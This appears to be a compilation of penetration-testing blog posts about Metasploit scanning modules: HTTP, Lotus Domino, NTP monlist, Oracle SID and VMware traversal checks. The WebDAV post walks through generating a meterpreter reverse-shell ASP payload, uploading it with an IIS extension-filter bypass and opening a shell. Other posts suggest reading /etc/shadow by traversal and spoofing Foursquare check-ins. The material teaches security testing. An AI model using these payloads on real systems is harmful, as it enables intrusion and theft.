Running Auxiliary Modules Against Multiple Hosts the Smart Way Part 2

In the previous post I talked about using the db_service -R to use the information in your database/workspace to throw an auxiliary module at hosts that had port 443 open.

Let's take this one step further...and throw multiple aux modules against the hosts that have port 80 open.

I'm going to use a resource script to do this. The cool thing about resource scripts is that you dont have to do them just at startup. You can do them anytime on the console.

msf auxiliary(options) > resource
Usage: resource path1 path2 ...

Run the commands stored in the supplied files.

In this case i want to run two modules against every port that has 80 open. Here's some code to do it:

set THREADS 10

[ruby] **#replace [ and ] with their respective "<" or ">"**'

#start with an array to hold our modules we want to run
modules = [
"auxiliary/scanner/http/http_version",
"auxiliary/scanner/http/options",]

#another array for our hosts
hosts = []
framework.db.services.each do |service| 
 if service.port == 443 
  hosts << service.host.address
 end
end

#loop through each module in the list
modules.each do |blah|
 self.run_single("use #{blah}")
  puts ("\nRunning Auxiliary Module #{blah}")
                #for each host with 443 open, set appropriate configs and run the module against it
  hosts.each do |rhost|
          self.run_single("set RHOSTS #{rhost}")
   self.run_single("set RPORT 443") #change to the port above
   self.run_single("set SSL TRUE")
          self.run_single("run")
  end 
end
[/ruby] **#replace [ and ] with their respective "<" or ">"**

Running it:

msf auxiliary(options) > resource /home/user/.msf3/aux_do_dbhosts.rc 
resource (/home/user/.msf3/aux_do_dbhosts.rc)> set THREADS 10
THREADS => 10
[*] resource (/home/user/.msf3/aux_do_dbhosts.rc)> Ruby Code (962 bytes)

Running Auxiliary Module auxiliary/scanner/http/http_version
RHOSTS => 192.168.1.10
RPORT => 443
SSL => TRUE
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.106
RPORT => 443
SSL => TRUE
[*] 192.168.1.106 nginx/0.6.32 ( 302-http://192.168.1.106/ )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.107
RPORT => 443
SSL => TRUE
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.135
RPORT => 443
SSL => TRUE
[*] 192.168.1.135 Apache/2.2.11 (Ubuntu) mod_ssl/2.2.11 OpenSSL/0.9.8g Phusion_Passenger/2.2.15 ( Powered by Phusion Passenger (mod_rails/mod_rack) 2.2.15 )
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.168
RPORT => 443
SSL => TRUE
[*] 192.168.1.168 Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2 PHP/5.2.4-2ubuntu5.3 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_wsgi/1.3
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.229
RPORT => 443
SSL => TRUE
[*] 192.168.1.229 Apache/2.2.9 (Debian) DAV/2 SVN/1.4.2 PHP/5.3.2-0.dotdeb.1 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.2 Perl/v5.8.8 ( Powered by PHP/5.3.2-0.dotdeb.1 )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Running Auxiliary Module auxiliary/scanner/http/options
RHOSTS => 192.168.1.10
RPORT => 443
SSL => TRUE
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.100
RPORT => 443
SSL => TRUE
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
...SNIP...YOU GET THE IDEA...

-CG

thanks to hdm and jcran

Running Auxiliary Modules Against Multiple Hosts the Smart Way

So a coulple of cool updates lately to metasploit framework. If you check out db_services you'll see a super handy feature of "-R"

msf auxiliary(http_version) > db_services -h

Usage: db_services [-h|--help] [-u|--up] [-a ] [-r ] [-p ] [-n ] [-o ]

 -a   Search for a list of addresses
 -c     Only show the given columns
 -h,--help         Show this help information
 -n   Search for a list of service names
 -p   Search for a list of ports
 -r      Only show [tcp|udp] services
 -u,--up           Only show services which are up
 -o          Send output to a file in csv format
 -R,--rhosts       Set RHOSTS from the results of the search

Available columns: created_at, info, name, port, proto, state, updated_at

In the past you could list your hosts by port (db_services -p 80) but I want to be able to USE those hosts and throw modules at them, bring in the -R option

msf auxiliary(http_version) > use auxiliary/scanner/http/options
msf auxiliary(options) > db_services -R -p 80

Services
========

host           port  proto  name  state  info
----           ----  -----  ----  -----  ----
192.168.1.245  80    tcp    http  open   Apache/2.2.3 (CentOS) ( Powered by PHP/5.1.6 )
192.168.1.246  80    tcp    http  open   Apache/2.2.3 (CentOS)
192.168.1.247  80    tcp    http  open   Apache/2.2.12 (Ubuntu)
192.168.1.248  80    tcp    http  open   lighttpd/1.5.0
192.168.1.249  80    tcp    http  open   Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.4 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g Phusion_Passenger/2.2.11
192.168.1.251  80    tcp    http  open   Apache
192.168.1.254  80    tcp    http  open   Apache/2.2.3 (CentOS)

RHOSTS => file:/tmp/msf-db-rhosts-20110423-27121-10wiuni-0

msf auxiliary(options) > run

[*] Scanned 1 of 7 hosts (014% complete)
[*] Scanned 2 of 7 hosts (028% complete)
[*] 192.168.1.247 allows GET,HEAD,POST,OPTIONS methods
[*] Scanned 3 of 7 hosts (042% complete)
[*]192.168.1.248 allows OPTIONS, GET, HEAD, POST methods
[*] Scanned 4 of 7 hosts (057% complete)
[*] 192.168.1.249 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Scanned 5 of 7 hosts (071% complete)
[*] Scanned 6 of 7 hosts (085% complete)
[*] Scanned 7 of 7 hosts (100% complete)
[*] Auxiliary module execution completed

-CG

Grabbing Index Pages Of Webservers

Grabbing the index pages of web servers seems like a no brainer and something every pentester is going to perform on a test. The problem I ran into is how do you get this info once your inside and using meterpreter as your pivot into the network.

Your current options are to port forward to each host or set up a route via your meterpreter session and run some sort of auxiliary module. You can tcp port scan and find open ports or use the http_version module to see server version but you don't get a feel for whats actually on the site.

I opted to write something that would scan a range, perform a HTTP GET of / on the ip, then take the resulting body from the response, which should be html, and save it to a file to look at afterwards.

Looks like this when it runs...

msf auxiliary(http_index_grabber) > set RHOSTS carnal0wnage.com/24
RHOSTS => carnal0wnage.com/24
msf auxiliary(http_index_grabber) > run
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.4_20100904.4426.html
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.5_20100904.4429.html
[*] Received 301 to http://drumsti.cc/ for 209.20.85.10:80/
[-] Received 403 for 209.20.85.8:80/
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.12_20100904.4432.html
...
[*] Received 302 to http://209.20.85.57/apache2-default/ for 209.20.85.57:80/ [+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.56_20100904.4503.html
[*] Received 302 to http://209.20.85.51/session/new for 209.20.85.51:80/

you can then check out the folder with the results


code is here:
http://carnal0wnage.googlecode.com/svn/trunk/msf3/modules/auxiliary/admin/random/http_index_grabber.rb

Metasploit Lotus Domino Version Scanner

I pushed out the first of a few Lotus Domino modules I've been working on to the metasploit trunk last nite.

The first one is a Lotus Domino Version Module.

There is no real "banner grabbing" for versions with Lotus Domino, old old versions "may" display the version in the server headers but I've never seen anything above 5.x do this. You usually get something like:

HTTP/1.0 200 OK
Server: Lotus-Domino
Date: Fri, 30 Apr 2010 00:19:11 GMT
Last-Modified: Wed, 07 Apr 2010 01:39:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5390
Cache-control: private
ETag: W/"MTAtODA4NS1DMTI1NzZENjAwMTVGRDhELTAtMA=="

for headers.

Useful enough to identify that its a Domino web server but not so much for using the couple of remote exploits out there that are very version and/or fixpack dependent.

There are a couple of files that the web server may serve up that have version information.

The first being iNotes/FormsX.nsf that usually has the version information as a comment in the html (this can be turned off) and the second being download/filesets/l_LOTUS_SCRIPT.inf
type files that has the base install version (at least as far as I can tell its the base install). *If thats not right please let me know*

So let's give it a test drive...

msf > use auxiliary/scanner/lotus/lotus_domino_version
msf auxiliary(lotus_domino_version) > info

      Name: Lotus Domino Version
   Version: $Revision$
   License: Metasploit Framework License (BSD)
      Rank: Normal

Provided by:
 CG

Basic options:
 Name     Current Setting  Required  Description
 ----     ---------------  --------  -----------
 PATH     /                yes       path
 Proxies                   no        Use a proxy chain
 RHOSTS                    yes       The target address range or CIDR identifier
 RPORT    80               yes       The target port
 THREADS  1                yes       The number of concurrent threads
 VHOST                     no        HTTP server virtual host

Description:
 Checks to determine Lotus Domino Server Version.

msf auxiliary(lotus_domino_version) > set RHOSTS file:/home/user/shodan-domino.txt
RHOSTS => file:/home/user/shodan-domino.txt
msf auxiliary(lotus_domino_version) > run

[*] 192.168.245.101:80 Lotus Domino Current Version: 6.5.4 (Windows NT/Intel)
[*] 192.168.245.101:80 Lotus Domino Base Install Version: 6.0.5.50
[*] 192.168.245.101:80 Lotus Domino Base Install Version: 6.0.5.50
[*] 192.168.245.101:80 Lotus Domino Base Install Version: 6.0.5.50
[*] 192.168.245.101:80 Lotus Domino Base Install Version: 6.0.5.50
[*] 192.168.80.132:80 Lotus Domino Current Version: 6.5.5 (Solaris Sparc)
[*] 192.168.80.132:80 Lotus Domino Base Install Version: 6.0.4
[*] 192.168.80.132:80 Lotus Domino Base Install Version: 6.0.4
[-] no response for 192.168.80.132:80 download/filesets/l_SEARCH.inf
[*] 192.168.80.132:80 Lotus Domino Base Install Version: 6.0.4
[*] Scanned 02 of 20 hosts (010% complete)
[*] 192.168.220.33:80 Lotus Domino Current Version: 8.0.2 HF1190 (Windows NT/Intel)
[*] 192.168.220.33:80 Lotus Domino Current Version: 8.0.2 HF1190 (Windows NT/Intel)
[*] 192.168.220.33:80 Lotus Domino Base Install Version: 8.0.1.0
[*] 192.168.220.33:80 Lotus Domino Base Install Version: 8.0.1.0
[*] 192.168.220.33:80 Lotus Domino Base Install Version: 8.0.1.0
[*] 192.168.220.33:80 Lotus Domino Base Install Version: 8.0.1.0
[-] 192.168.152.68:80 302 Redirect to https://192.168.152.68/iNotes/Forms5.nsf
[-] 192.168.152.68:80 302 Redirect to https://192.168.152.68/iNotes/Forms6.nsf
[-] 192.168.152.68:80 302 Redirect to https://192.168.152.68/iNotes/Forms7.nsf
[-] 192.168.152.68:80 302 Redirect to https://192.168.152.68/download/filesets/l_LOTUS_SCRIPT.inf
[-] 192.168.152.68:80 302 Redirect to https://192.168.152.68/download/filesets/n_LOTUS_SCRIPT.inf
[-] 192.168.152.68:80 302 Redirect to https://192.168.152.68/download/filesets/l_SEARCH.inf
[-] 192.168.152.68:80 302 Redirect to https://192.168.152.68/download/filesets/n_SEARCH.inf
[*] Scanned 04 of 20 hosts (020% complete)
[*] 192.168.166.33:80 Lotus Domino Current Version: 7.0.1 (Windows NT/Intel)
[*] 192.168.166.33:80 Lotus Domino Current Version: 7.0.1 (Windows NT/Intel)
[*] 192.168.166.33:80 Lotus Domino Base Install Version: 7.0.1.0
[*] 192.168.166.33:80 Lotus Domino Base Install Version: 7.0.1.0
[*] 192.168.166.33:80 Lotus Domino Base Install Version: 7.0.1.0
[*] 192.168.166.33:80 Lotus Domino Base Install Version: 7.0.1.0
[*] Scanned 06 of 20 hosts (030% complete)
[*] 192.168.33.93:80 Lotus Domino Current Version: 7.0.2 (Windows NT/Intel)
[*] 192.168.33.93:80 Lotus Domino Current Version: 7.0.2 (Windows NT/Intel)
[*] 192.168.33.93:80 Lotus Domino Base Install Version: 7.0.2.0
[*] 192.168.33.93:80 Lotus Domino Base Install Version: 7.0.2.0
[*] 192.168.33.93:80 Lotus Domino Base Install Version: 7.0.2.0
[*] 192.168.33.93:80 Lotus Domino Base Install Version: 7.0.2.0
[*] 192.168.246.154:80 Lotus Domino Current Version: 7.0.3FP1 (Windows NT/Intel)
[*] 192.168.246.154:80 Lotus Domino Current Version: 7.0.3FP1 (Windows NT/Intel)
[*] 192.168.246.154:80 Lotus Domino Base Install Version: 7.0.3.0
[*] 192.168.246.154:80 Lotus Domino Base Install Version: 7.0.3.0
[*] 192.168.246.154:80 Lotus Domino Base Install Version: 7.0.3.0
[*] 192.168.246.154:80 Lotus Domino Base Install Version: 7.0.3.0
... 

More with Metasploit and WebDAV

intro..webdav stuff...lazy...

To get yourself a test environment you can follow this tutorial, its not bad. You'll want to make sure you pay attention to the part about allowing your IUSR_WHATEVER account to have have write access or you can set up a windows account to use authentication.

metasploit has a few modules to test for webDAV presence.

webdav_scanner:

msf auxiliary(webdav_scanner) > run

[*] 192.168.242.134 (Microsoft-IIS/6.0) has WEBDAV ENABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

webdav_internal_ip

msf auxiliary(webdav_internal_ip) > run

[*] Found internal IP in WebDAV response (192.168.242.134) 192.168.242.134
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

webdav_website_content

msf auxiliary(webdav_website_content) > run
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/iisstart.htm
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/pagerror.gif
[*] Found file or directory in WebDAV response (192.168.242.134) http://domino/davaroo/
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The important one there is the davaroo directory if someone has shared out the root directory it will usually just look like this:

[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/

Or if you have the path wrong

msf auxiliary(webdav_test) > run

[*] 192.168.242.134/DAV/ has DAV DISABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

If we need to see what options are allowed, you can use the http options auxiliary module.

msf auxiliary(options) > run

[*] 192.168.242.134 allows OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK methods
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

to see if you can upload things quickly you can give DAVtest a try or Ryan Linn's webdav_test module.

msf auxiliary(webdav_test) > run

[*] 192.168.242.134/davaroo/ has DAV ENABLED
[*] Attempting to create /davaroo/WebDavTest_111vO5Ats7
[*] 192.168.242.134/davaroo/ is WRITEABLE
[*] Trying /davaroo/WebDavTest_111vO5Ats7/9RiwStjSE7bI4dv.html
[*] Trying /davaroo/WebDavTest_111vO5Ats7/pd84WuxboP6ZvcN.jhtml
[*] Trying /davaroo/WebDavTest_111vO5Ats7/Lqy4HqgiNoqS9YQ.php
[*] Trying /davaroo/WebDavTest_111vO5Ats7/y2QL82GmZvFHv0U.txt
[*] Trying /davaroo/WebDavTest_111vO5Ats7/W2CNVzATLpt9XeU.cgi
[*] Trying /davaroo/WebDavTest_111vO5Ats7/acl1gOJlmSu5fXf.pl
[*] Trying /davaroo/WebDavTest_111vO5Ats7/pKR4pLVcDpcPCnB.jsp
[*] Trying /davaroo/WebDavTest_111vO5Ats7/KWj69GgzXIHrR0j.aspx
[*] Trying /davaroo/WebDavTest_111vO5Ats7/1ImlpmATPINV2Zj.asp
[*] Trying /davaroo/WebDavTest_111vO5Ats7/OT0B3cOEFLgnIGB.shtml
[*] Trying /davaroo/WebDavTest_111vO5Ats7/yGSr7GVoEmjcQCf.cfm
[*] Attempting to cleanup /davaroo/WebDavTest_111vO5Ats7
[*] Uploadable files are: html,jhtml,php,txt,cgi,pl,jsp,aspx,cfm
[*] Executable files are: html,txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

What you'll probably run into here is the INABILITY to upload executable content or anything otherwise useful on the box. in this case i can upload php, cgi, jsp, aspx, but nothing is there to execute any of that content.

If you try to upload an .asp you'll get a 403 forbidden or if you try to COPY/MOVE a .txt to .asp you'll get a forbidden. :-(

Thankfully there is a "feature" of 2k3 that allows you to upload evil.asp;.txt and that will bypass the filter.

So we generate out evil.asp file using msfpayload and msfencode, you could also use any other asp shell too...

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.94 LPORT=443 R |
./msfencode -t asp -o tcp443meterp.asp
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

upload it and rename it

dav:/davaroo/> put tcp443meterp.asp tcp443meterp.txt
Uploading tcp443meterp.asp to `/davaroo/tcp443meterp.txt':
Progress: [=============================>] 100.0% of 314810 bytes succeeded.
dav:/davaroo/> copy tcp443meterp.txt tcp443meterp.asp;.txt
Copying `/davaroo/tcp443meterp.txt' to `/davaroo/tcp443meterp.asp%3b.txt':  succeeded.
dav:/davaroo/> exit

now you can browse to the page at ip/tcp443meterp.asp;.txt and get your shell

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.6.94:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.6.94
[*] Meterpreter session 1 opened (192.168.6.94:443 -> 192.168.242.134:49306)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: 6
meterpreter > sysinfo
Computer: WebDAVRulez
OS      : Windows .NET Server (Build 3790, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter > run migrate -f notepad.exe
[*] Current server process: svchost.exe (1792)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 312
[*] New server process: notepad.exe (312)
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE

What I ran into was that your shell came back with a less than desirable privilege (Network Service). You'll have to work the local angle to elevate but at least you have a shell.

more info here: http://blog.metasploit.com/2009/12/exploiting-microsoft-iis-with.html

Resources:
cadaver: http://www.webdav.org/cadaver/
DAVtest: http://security.sunera.com/2010/04/davtest-quickly-test-exploit-webdav.html
Ryan Linn's port of DAVtest to metasploit: http://trac.happypacket.net/browser/msfmods/trunk/modules/auxiliary/scanner/http/webdav_test.rb

Network Time Protocol (NTP) Fun

@hdmoore released a new auxiliary module a few days ago that went along with his NTP research he has been doing.

msf auxiliary(ntp_monlist) > set RHOSTS time.euro.apple.com

RHOSTS => time.euro.apple.com
msf auxiliary(ntp_monlist) > info

    Name: NTP Monitor List Scanner
 Version: 8432
 License: Metasploit Framework License (BSD)
    Rank: Normal

Provided by:
hdm 

Basic options:
Name       Current Setting      Required  Description
----       ---------------      --------  -----------
BATCHSIZE    256                  yes       The number of hosts to probe in each set
CHOST                             no        The local client address
RHOSTS       time.euro.apple.com  yes       The target address range or CIDR identifier
RPORT        123                  yes       The target port
THREADS      1                    yes       The number of concurrent threads

Description:
Obtain the list of recent clients from an NTP server

msf auxiliary(ntp_monlist) >

And when you run the module, it looks a bit like this:

msf auxiliary(ntp_monlist) > run

[*] Sending probes to 17.72.255.11->17.72.255.11 (1 hosts)
[*] 17.72.255.11:123 86.138.33.93:56042 (17.72.255.11)
[*] 17.72.255.11:123 188.192.151.225:52210 (17.72.255.11)
[*] 17.72.255.11:123 81.167.222.18:36866 (17.72.255.11)
[*] 17.72.255.11:123 89.247.73.227:63929 (17.72.255.11)
[*] 17.72.255.11:123 80.39.165.55:123 (17.72.255.11)
[*] 17.72.255.11:123 82.19.218.58:123 (17.72.255.11)
[*] 17.72.255.11:123 82.123.121.154:123 (17.72.255.11)
[*] 17.72.255.11:123 90.207.190.29:123 (17.72.255.11)
[*] 17.72.255.11:123 193.52.24.125:38377 (17.72.255.11)
[*] 17.72.255.11:123 91.10.239.87:64361 (17.72.255.11)
--SNIP--
[*] 17.72.255.11:123 89.241.98.89:27213 (17.72.255.11)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ntp_monlist) > 

Other neat shiz...

Sensepost put out a cool post talking about some of the other neat queries you can do using the ntp tools.

http://www.sensepost.com/blog/4552.html

Some quick research into NTP(from ww.ntp.org) revealed that NTP servers allow you to perform a bunch of commands that are secondary to time keeping. You can easily play with these using the ntpdc client program eg. 'ntpdc target.ntp.server'. Some of these commands include:

• listpeers - List the peers(NTP servers) for the time server
• showpeer - Give time keeping info about a specific peer time server
• peers - List peers and some basic time keeping info
• sysstats - Info regarding ntp daemon itself

$ ntpq -c readvar time.euro.apple.com
assID=0 status=0684 leap_none, sync_ntp, 8 events, event_peer/strat_chg,version="ntpd 4.2.2@1.1532-o Mon Sep 24 
01:42:27 UTC 2007 (1)", processor="i386", system="Darwin/9.6.0", leap=00, stratum=2, precision=-20, rootdelay=0.682, rootdispersion=10.719, peer=8126, 
refid=17.72.133.54, reftime=cf648929.538400d4  Mon, Apr  5 2010 12:07:05.326, poll=7, clock=cf648a97.2560d91c  Mon, Apr  5 2010 12:13:11.146, state=4, offset=0.149, frequency=43.608, jitter=0.058, noise=0.041, stability=0.000, tai=0 

$ ntpdc -c peers time.euro.apple.com
remote           local      st poll reach  delay   offset    disp
=======================================================================
*time1.euro.appl 17.72.255.11     1  128  377 0.00069  0.000155 0.07887
=time2.euro.appl 17.72.255.11     1  128  377 0.00061  0.000177 0.08919
=17.254.0.49     17.72.255.11     1  128  377 0.14996  0.000237 0.06696
=TrueTime.asia.a 17.72.255.11     1  128  377 0.31990 -0.000027 0.04962
=A17-106-100-13. 17.72.255.11     2  128    0 0.17369  0.007904 3.99217
+time4.euro.appl 17.72.255.11     2   32  376 0.00015 -0.000151 0.04303

$ ntpdc -c listpeers time.euro.apple.com
client    time1.euro.apple.com
client    time2.euro.apple.com
client    17.254.0.49
client    TrueTime.asia.apple.com
client    A17-106-100-13.apple.com
sym_active time4.euro.apple.com

Of course if you just want to do the monlist yourself you can...

$ ntpdc -c monlist time.euro.apple.com
remote address          port local address      count m ver code avgint  lstint
===============================================================================
94.96.201.223.dynamic. 50951 17.72.255.12           5 3 4      0      0       0
static-86-51-114-108.m   316 17.72.255.12          25 3 4      0      0       0
207-38-154-68.c3-0.ave 40311 17.72.255.12           7 3 4      0      0       0
62-177-171-130.dsl.bbe   501 17.72.255.12           1 3 4      0      0       0
bb6a37ee.virtua.com.br   123 17.72.255.12           1 3 4      0      0       0
p4FC7545E.dip.t-dialin   123 17.72.255.12           1 3 4      0      0       0
--SNIP--

Still Interested?
http://www.ntp.org/documentation.html

F**king With Foursquare Goes MSF Style

mindless foursquare fun goes metasploit style...

msf > use auxiliary/admin/foursquare
msf auxiliary(foursquare) > info


Name: Foursquare Location Poster
Version: $Revision:$
License: Metasploit Framework License (BSD)
Rank: Normal


Provided by:
CG


Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD password yes foursquare password
Proxies no Use a proxy chain
RHOST api.foursquare.com yes The target address
RPORT 80 yes The target port
USERNAME username yes foursquare username
VENUEID 185675 yes foursquare venueid
VHOST no HTTP server virtual host


Description:
Fuck with Foursquare, be anywhere you want to be by venue id


References:
http://groups.google.com/group/foursquare-api
http://www.mikekey.com/im-a-foursquare-cheater/

msf auxiliary(foursquare) >
msf auxiliary(foursquare) > set USERNAME notmyusername@host.com
USERNAME => notmyusername@host.com
msf auxiliary(foursquare) > set PASSWORD notmypassword
PASSWORD => notmypassword
msf auxiliary(foursquare) > set VENUEID 9186
VENUEID => 9186

msf auxiliary(foursquare) > run

[*] HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Date: Fri, 19 Mar 2010 13:59:28 GMT
Content-Length: 1311
Server: nginx/0.7.64
Connection: keep-alive


Fri, 19 Mar 10 13:59:28 +0000OK! We've got you @ Washington Monument. This is your 1st checkin here!9186Washington Monument79199Parks & Outdoors:Sculpture SNIP

[*] Auxiliary module execution completed

You can get the module here:
http://code.google.com/p/carnal0wnage/source/browse/trunk/msf3/modules/auxiliary/admin/random/foursquare.rb

VMWare Directory Traversal Metasploit Module

Since everyone else is releasing code to check for/exploit the vmware server/esx/esxi directory traversal vulnerability I pushed up my checker module to the metasploit trunk as an auxiliary scanner module.

If you want to just download a full guest host check out:
GuestStealer -- http://www.fyrmassociates.com/tools/gueststealer-v1.1.pl

or the

nmap script -- http://www.skullsecurity.org/blog/?p=436

I don't feel like re-implementing it and I for sure don't want anything ever auto-downloading several gigabytes of information for me, so if you want that functionality write it or use the above tools. Gueststealer works great.

Vulnerability References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3733
http://www.vmware.com/security/advisories/VMSA-2009-0015.html


The module:
The module is simple enough. By default it checks for:

FILE /etc/vmware/hostd/vmInventory.xml

If it receives a 200 to the traversal string and file it says its vulnerable. If you want to see the output of the file you can uncomment the following line from the code:

#print_status("Output Of Requested File:\n#{res.body}")

reload the module, then change the file to what you want (example: set FILE /etc/shadow).

Since VMWare runs as root you pretty much have access to anything on the file system.

Oracle Sid Enumeration Metasploit Auxiliary Module

I recently pushed out (again with MC's) help an Oracle Sid enumeration MSF auxiliary module for Oracle versions less than Oracle 10g Release 2. Starting with 10g Release 2 the TNS listener is protected and wont just cough up the SID for free, you'll have to guess it or brute force it (hopefully the SID guess module will come soon).

Here it is in action

msf > use auxiliary/admin/oracle/oracle_sid
msf auxiliary(oracle_sid) > info

Name: Oracle SID Enumeration.
Version: $Revision$

Provided by:
CG

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 1521 yes The target port

Description:
This module simply queries the TNS listner for the Oracle SID. With
10g Release 2 and above the listener will be protected and the SID
will have to be bruteforced or guessed.

msf auxiliary(oracle_sid) > set RHOST 192.168.0.43
RHOST => 192.168.0.43
msf auxiliary(oracle_sid) > run

[*] Identified SID for 192.168.0.43: admin1
[*] Identified SID for 192.168.0.43: admin2
[*] Identified SID for 192.168.0.43: database
[*] Identified SID for 192.168.0.43: dba3
[*] Identified SID for 192.168.0.43: dba5
[*] Identified SID for 192.168.0.43: dba7
[*] Identified SERVICE_NAME for 192.168.0.43: admin1
[*] Identified SERVICE_NAME for 192.168.0.43: admin2
[*] Identified SERVICE_NAME for 192.168.0.43: database
[*] Identified SERVICE_NAME for 192.168.0.43: dba3
[*] Identified SERVICE_NAME for 192.168.0.43: dba5
[*] Identified SERVICE_NAME for 192.168.0.43: dba7
[*] Auxiliary module execution completed
msf auxiliary(oracle_sid) >

If its protected you'll see this:

msf auxiliary(oracle_sid) > set RHOST 192.168.0.137
RHOST => 192.168.0.137
msf auxiliary(oracle_sid) > run

[-] TNS listener protected for 192.168.0.137...
[*] Auxiliary module execution completed

If you are on the MSF 3.3 trunk a svn update should be all you need to do.

Metasploit HTTP Options Aux Module

I basically bastardized hdm's version aux module to create an options module. I wanted something that would look for web servers that allowed the PUT Method.

the code:

##
# options.rb
# bastardized from version module
##
# This file is part of the Metasploit Framework and may be
# subject to redistribution and commercial restrictions.
# Please see the Metasploit Framework web site for more
# information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Auxiliary::Scanner::Http::Options < Msf::Auxiliary
# Exploit mixins should be called first
include Exploit::Remote::HttpClient

# Scanner mixin should be near last
include Auxiliary::Scanner

def initialize
super(
'Name' => 'HTTP Options Detection',
'Version' => '$Revision: 4886 $',
'Description' => 'Display available http options about each system',
'Author' => 'CG',
' License' => MSF_LICENSE
)

end

# Fingerprint a single host
def run_host(ip)

self.target_port = datastore['RPORT']

begin
res = send_request_raw({
'version' => '1.0',
'uri' => '*',
'method' => 'OPTIONS'
}, 10)

if (res and res.headers['Allow'])
print_status("#{ip} allows #{res.headers['Allow']} methods")
end



rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end


end
end

the module in action:

msf auxiliary(options) > run
[*] a.b.c.30 allows OPTIONS, GET, HEAD, POST methods
[*] a.b.c.67 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.104 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.130 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.135 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.141 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.142 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.147 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] a.b.c.149 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] a.b.c.211 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.212 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] a.b.c.246 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] Auxiliary module execution completed
msf auxiliary(options) >

of course, allowing PUT doesn't necessarily all "you" to PUT anything. Most of the time you'll find that it doesnt. That's because the web server on IIS5+ doesn't allow write or modify by default.

cg@segfault:~$ cadaver
dav:!> open http://a.b.c.246
dav:/> put upload.txt
Uploading upload.txt to `/upload.txt':
Progress: [=============================>] 100.0% of 3981 bytes failed:
403 Forbidden
dav:/> exit

old school 0wning MSSQL --fun from the field

rule #1 dont expose your database to the world

rule #2 dont have a null sa account, especially if you are violating rule #1...

let's see...

use unicornscan to search for open TCP port 1433

cg@segfault:~/evil/scanners/$ sudo unicornscan A.B.0.0/16:1433 -p

Open ms-sql-s[ 1433] From A.B.Z.25 ttl 107
Open ms-sql-s[ 1433] From A.B.X.28 ttl 107
Open ms-sql-s[ 1433] From A.B.C.30 ttl 108
Open ms-sql-s[ 1433] From A.B.Z.34 ttl 108
Open ms-sql-s[ 1433] From A.B.Z.50 ttl 106
